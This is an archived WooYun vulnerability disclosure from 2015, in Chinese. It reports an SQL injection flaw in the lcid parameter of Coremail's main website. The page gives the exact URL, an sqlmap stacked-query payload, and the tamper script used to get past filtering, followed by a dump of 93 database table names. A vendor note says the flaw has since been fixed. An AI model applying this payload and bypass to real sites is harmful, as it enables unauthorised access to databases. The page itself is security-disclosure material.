乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-20: 细节已通知厂商并且等待厂商处理中 2015-07-22: 厂商已经确认,细节仅向厂商公开 2015-08-01: 细节向核心白帽子及相关领域专家公开 2015-08-11: 细节向普通白帽子公开 2015-08-21: 细节向实习白帽子公开 2015-09-05: 细节向公众公开
盈世主站存在sql注入漏洞
盈世主站存在sql注入漏洞,做了一定程度的防护,但可以使用sqlmap中的chardoubleencode.py,tamper脚本进行绕过。
首先是连接:http://www.coremail.cn/gjzc/index_104.aspx?lcid=66注入点是lcid
Place: GETParameter: lcid Type: boolean-based blind Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries Payload: lcid=66; IF(8842=8842) SELECT 8842 ELSE DROP FUNCTION gcAK--
直接使用sqlmap注入只能跑出数据库类型
使用chardoubleencode.py脚本进行绕过后可以跑出数据库名、表名和表内数据
共跑出ysxx201412197372库内93个表
+----------------------------+| Whir_Cmn_Area || Whir_Cnt_Attached || Whir_Cnt_CreateLog || Whir_Cnt_Relation || Whir_Cnt_Subject || Whir_Cnt_SubjectClass || Whir_Cnt_SubjectColumn || Whir_Cnt_WorkFlowLogs || Whir_DevXColumn || Whir_Dev_Field || Whir_Dev_Form || Whir_Dev_FormArea || Whir_Dev_FormDate || Whir_Dev_FormOption || Whir_Dev_FormUpload || Whir_Dev_Menu || Whir_Dev_Model || Whir_Dev_Module || Whir_Dev_Plugin || Whir_Dev_SubmitForm || Whir_ExsPBackup || Whir_Ext_AuditActivity || Whir_Ext_Collect || Whir_Ext_CollectField || Whir_Ext_Gather || Whir_Ext_GatherTable || Whir_Ext_OperateLog || Whir_Ext_SendEmailRecord || Whir_Ext_SensitiveWords || Whir_Ext_Tools || Whir_Ext_Upload || Whir_Ext_WorkFlow || Whir_Mem_Member || Whir_Mem_MemberGroup || Whir_Oa_NewsConfig || Whir_Oa_NewsTemp || Whir_Plu_Advert || Whir_Plu_AdvertPosition || Whir_Plu_SiteMap || Whir_Sec_Resources || Whir_Sec_Roles || Whir_Sec_RolesInResources || Whir_Sec_Users || Whir_Sit_SiteInfo || Whir_U_Category || Whir_U_Category_Bak || Whir_U_Content || Whir_U_Content_Bak || Whir_U_Content_Category || Whir_U_Download || Whir_U_Download_Bak || Whir_U_Download_Category || Whir_U_Feedback || Whir_U_FeedbackXBak || Whir_U_Forms || Whir_U_Forms_Bak || Whir_U_Jobs || Whir_U_Jobs_Bak || Whir_U_Jobs_Category || Whir_U_Jobs_JobRequest || Whir_U_Links || Whir_U_Links_Bak || Whir_U_Magazine || Whir_U_Magazine_Bak || Whir_U_Magazine_Chapter || Whir_U_Prhduct || Whir_U_Product_Bak || Whir_U_Product_Category || Whir_U_SalesNet || Whir_U_SalesNet_Bak || Whir_U_SinglePage || Whir_U_SinglePage_Bak || Whir_U_SubContent || Whir_U_SubContentPBak || Whir_U_SubContent_Category || Whir_U_SubForms || Whir_U_SubForms_Bak || Whir_U_SubPage || Whir_U_SubPage_Bak || Whir_U_SubProduct || Whir_U_SubProduct_Bak || Whir_U_SubProduct_Category || Whir_U_Survey || Whir_U_Survey_Answer || Whir_U_Survey_Bak || Whir_U_Survey_Detail || Whir_U_Survey_Question || Whir_U_Vote || Whir_U_Vote_Answer || Whir_U_Vote_Bak || Whir_U_Vote_Detail || Whir_Dev_ConfigStr\x1dtegy || Whir_U_Magazine_Inf r |+----------------------------+
跑了两个表内的数据验证一下
过滤
危害等级:高
漏洞Rank:12
确认时间:2015-07-22 15:06
感谢反馈,已完成对该漏洞的修复。
暂无